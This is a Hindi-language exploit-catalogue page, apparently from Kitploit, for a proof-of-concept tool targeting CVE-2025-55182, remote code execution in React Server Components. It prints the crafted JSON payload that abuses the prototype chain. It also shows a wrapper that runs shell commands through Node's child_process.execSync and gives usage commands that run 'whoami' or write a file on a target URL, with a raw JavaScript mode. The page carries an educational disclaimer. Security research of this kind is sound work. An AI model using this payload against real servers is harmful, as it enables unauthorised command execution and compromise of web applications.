Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react-ssr-vulnerability — यह CVE-2025-55182 (React SSR RCE) के लिए एक POC स्क्रिप्ट है | Kitploit
उपकरण/GitHubGitHub/darker-ink/react-ssr-vulnerability
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubdarker-ink/react-ssr-vulnerability

react-ssr-vulnerability

यह CVE-2025-55182 (React SSR RCE) के लिए एक POC स्क्रिप्ट है

रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 - React Server Components RCE POC

यह POC केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। यह भेद्यता प्रभावित पैकेजों के नवीनतम संस्करणों में पैच की जा चुकी है। इस उपकरण का उपयोग केवल उन सिस्टमों पर करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है। मैं आपके विरुद्ध किसी भी कानूनी कार्रवाई के लिए उत्तरदायी नहीं हूँ।

पेलोड निर्माण

यह एक्सप्लॉइट एक विशेष रूप से तैयार किया गया JSON ऑब्जेक्ट बनाता है जो जावास्क्रिप्ट की प्रोटोटाइप श्रृंखला का दुरुपयोग करता है:

root@kitploit:~
{
  "then": "$1:__proto__:then",           // प्रोटोटाइप श्रृंखला को दूषित करता है
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": jsCode,                    // इंजेक्ट किया गया दुर्भावनापूर्ण कोड
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

कमांड रैपिंग

POC दो मोड का समर्थन करता है:

स्टैंडर्ड मोड (डिफ़ॉल्ट):

root@kitploit:~
process.mainModule.require("child_process").execSync("YOUR_COMMAND");

शेल कमांड को Node.js के child_process के माध्यम से निष्पादन के लिए लपेटता है।

रॉ मोड (--raw फ़्लैग):

root@kitploit:~
// मनमाना जावास्क्रिप्ट सीधे निष्पादित करता है

शेल कमांड रैपिंग के बिना सीधे जावास्क्रिप्ट कोड निष्पादन की अनुमति देता है।

उपयोग

बेसिक कमांड निष्पादन

root@kitploit:~
bun run index.ts <command_file> <target_url>

उदाहरण:

root@kitploit:~
# एक कमांड फ़ाइल बनाएँ
echo "whoami" > cmd.txt

# भेद्य एंडपॉइंट के विरुद्ध निष्पादित करें
bun run index.ts cmd.txt http://localhost:3000

रॉ जावास्क्रिप्ट मोड

root@kitploit:~
bun run index.ts --raw <js_file> <target_url>

उदाहरण:

root@kitploit:~
# जावास्क्रिप्ट पेलोड बनाएँ
echo "require('fs').writeFileSync('/tmp/pwned.txt', 'RCE Success')" > payload.js

# रॉ जावास्क्रिप्ट निष्पादित करें
bun run index.ts --raw payload.js http://localhost:3000

तर्क

  • <file_path>: वह फ़ाइल का पथ जिसमें कमांड या जावास्क्रिप्ट कोड है।
  • <target_url>: React सर्वर फ़ंक्शन एंडपॉइंट का URL।
  • --raw: (वैकल्पिक) शेल कमांड के बजाय रॉ जावास्क्रिप्ट निष्पादित करें।

श्रेय

खोजकर्ता: लचलान डेविडसन
प्रकटकर्ता: React टीम और मेटा सुरक्षा

संदर्भ

  • आधिकारिक React सुरक्षा सलाहकार
  • CVE-2025-55182
टूल डाउनलोड करें